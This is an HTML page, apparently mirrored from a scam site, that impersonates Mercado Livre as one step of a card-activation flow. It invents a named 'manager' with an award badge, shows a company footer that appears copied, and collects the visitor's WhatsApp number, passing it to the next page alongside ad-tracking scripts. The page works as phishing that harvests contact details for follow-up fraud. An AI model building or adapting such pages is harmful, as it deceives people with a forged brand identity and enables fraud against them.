<!DOCTYPE html><html lang="pt-BR">
<!-- Mirrored from mercadomlcards.shop/11/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 May 2025 21:33:49 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="stylesheet" href="css/all.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Sora:wght@400;700&amp;display=swap" rel="stylesheet">
    <title>Gerente de Envio</title>

<script>
  window.googlePixelId = "6819111d20b0319a5e906333";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "../../cdn.utmify.com.br/scripts/pixel/pixel-google.js");
  document.head.appendChild(a);
</script>

<script
  src="../../cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script>

    <style>
        body {
            margin: 0;
            font-family: 'Sora', sans-serif;
            background-color: #f2f2f2;
            color: #333;
        }
        .header {
            display: flex;
            align-items: center;
            padding: 10px;
            border-bottom: 1px solid #aa9900;
            background-color: #FFE600;
        }
        .logo {
            width: 125px;
            padding: 10px;
            margin-left: 20px;
        }
        .content {
            padding: 20px;
            max-width: 600px;
            margin: 0 auto;
        }
        h1 {
            font-size: 24px;
            margin-bottom: 10px;
            text-align: center;
        }
        .manager-card {
            background-color: #fff;
            border-radius: 12px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            padding: 20px;
            text-align: center;
            margin: 20px 0;
        }
        .manager-title {
            font-size: 18px;
            font-weight: bold;
            margin-bottom: 15px;
        }
        .manager-subtitle {
            color: #666;
            font-size: 14px;
            margin-bottom: 20px;
            line-height: 1.4;
        }
        .manager-image {
            width: 120px;
            height: 120px;
            border-radius: 50%;
            object-fit: cover;
            border: 3px solid #ffbf00;
            margin: 0 auto 10px;
        }
        .manager-name {
            color: #ffbf00;
            font-weight: bold;
            font-size: 18px;
            margin: 10px 0;
        }
        .manager-badge {
            background-color: #ffbf00;
            color: #ffffff;
            display: inline-block;
            padding: 5px 10px;
            border-radius: 20px;
            font-size: 13px;
            margin: 10px 0;
            font-weight: bold;
        }
        .manager-description {
            color: #666;
            font-size: 14px;
            line-height: 1.5;
            margin: 15px 0;
        }
        .manager-contact {
            display: flex;
            align-items: center;
            justify-content: center;
            margin: 15px 0;
            font-size: 16px;
            color: #333;
        }
        .button {
            background-color: #FFE600;
            color: #1c1c1c;
            padding: 15px;
            border-radius: 8px;
            border: none;
            width: 100%;
            font-family: 'Sora', sans-serif;
            font-weight: bold;
            font-size: 16px;
            cursor: pointer;
            margin-top: 15px;
            transition: background-color 0.3s;
        }
        .button:hover {
            background-color: #ffd700;
        }
        .button i {
            margin-left: 5px;
        }
        input:focus {
            border-bottom: 2px solid #FFE600 !important;
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="images/yuSDX7M.png" alt="Logo Mercado Livre" class="logo">
    </div>

    <div class="content" style="margin-top: -15px;">
        <div class="manager-card">
            <h1 style="margin-top: 0px;">Ótimo, quase lá!</h1>
            <p class="manager-subtitle">
                Conheça sua Gerente, ela irá auxiliar na ativação do seu cartão e esclarecer todas as suas dúvidas!
            </p>
            
            <div class="card" style="background-color: #fff7db; border-radius: 10px; padding: 20px; padding-bottom: 10px; margin-bottom: 20px; border: 1px solid #ffbf00;">
                <img src="images/gerente.png" alt="Foto da Gerente" class="manager-image">
                <p style="color: #666; font-size: 14px; margin: 5px 0;">Gerente</p>
                <p class="manager-name" style="margin-top: -5px;">Juliana Benedito</p>
                
                <div class="manager-badge" style="margin-top: 0px;">
                    <i class="fas fa-trophy" style="color: #ffffff; margin-right: 5px;"></i>
                    Melhor gerente 2023-2024
                </div>
            </div>
            
            <div class="manager-contact">
                <i class="fab fa-whatsapp" style="color: #25D366; margin-right: 10px; font-size: 20px;"></i>
                <input type="tel" id="whatsapp" name="whatsapp" placeholder="Digite seu WhatsApp aqui" style="border: none; border-bottom: 1px solid #ddd; outline: none; font-family: 'Sora', sans-serif; font-size: 16px; width: 70%; padding: 5px;" maxlength="15" onkeyup="mascaraTelefone(this)">
            </div>
            
            <button onclick="salvarTelefone()" class="button">
                Continuar <i class="fas fa-arrow-right"></i>
            </button>
        </div>

        <footer style="padding: 10px 15px; text-align: center; margin-top: 50px; background-color: #f9f9f9; border-top: 1px solid #eaeaea; font-family: 'Sora', sans-serif;">
            <div style="max-width: 600px; margin: 0 auto;">
                <p style="color: #777; font-size: 10px; margin-bottom: 5px; line-height: 1.2;">
                    Mercado Livre Brasil LTDA | CNPJ: 79.379.491.0008-50
                </p>
                <p style="color: #777; font-size: 10px; margin-bottom: 5px; line-height: 1.2;">
                    Av. das Nações Unidas, 3000 - Bonfim, Osasco - SP, 06233-903
                </p>
                <p style="color: #999; font-size: 9px; margin-top: 5px;">
                    © 2025 - Todos os direitos reservados
                </p>
            </div>
        </footer>
    </div>

    <script>
        function mascaraTelefone(input) {
            let valor = input.value.replace(/\D/g, '');
            if (valor.length > 11) valor = valor.substring(0, 11);
            
            if (valor.length > 0) {
                valor = '(' + valor;
                
                if (valor.length > 3) {
                    valor = valor.substring(0, 3) + ') ' + valor.substring(3);
                }
                
                if (valor.length > 10) {
                    valor = valor.substring(0, 10) + '-' + valor.substring(10);
                }
            }
            
            input.value = valor;
        }
        
        function getUrlParams() {
            const params = {};
            const queryString = window.location.search;
            const urlParams = new URLSearchParams(queryString);
            
            for (const [key, value] of urlParams) {
                params[key] = value;
            }
            return params;
        }
        
        function salvarTelefone() {
            const telefone = document.getElementById('whatsapp').value;
            const telefoneNumeros = telefone.replace(/\D/g, '');
            
            if (!telefone || telefoneNumeros.length < 10) {
                alert("Por favor, insira um número de WhatsApp válido com DDD");
                return;
            }
            
            localStorage.setItem('telefone', telefone);
            
            // Adiciona o telefone como parâmetro na URL
            let url = '../12/index.html?telephone=' + encodeURIComponent(telefoneNumeros);
            
            // Adiciona outros parâmetros da URL atual
            const params = getUrlParams();
            let queryString = '';
            
            for (const key in params) {
                if (key !== 'telephone') {
                    if (queryString.length > 0) queryString += '&';
                    queryString += key + '=' + encodeURIComponent(params[key]);
                }
            }
            
            if (queryString) {
                url += '&' + queryString;
            }
            
            window.location.href = url;
        }
    </script>

</body>
<!-- Mirrored from mercadomlcards.shop/11/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 May 2025 21:33:50 GMT -->
</html>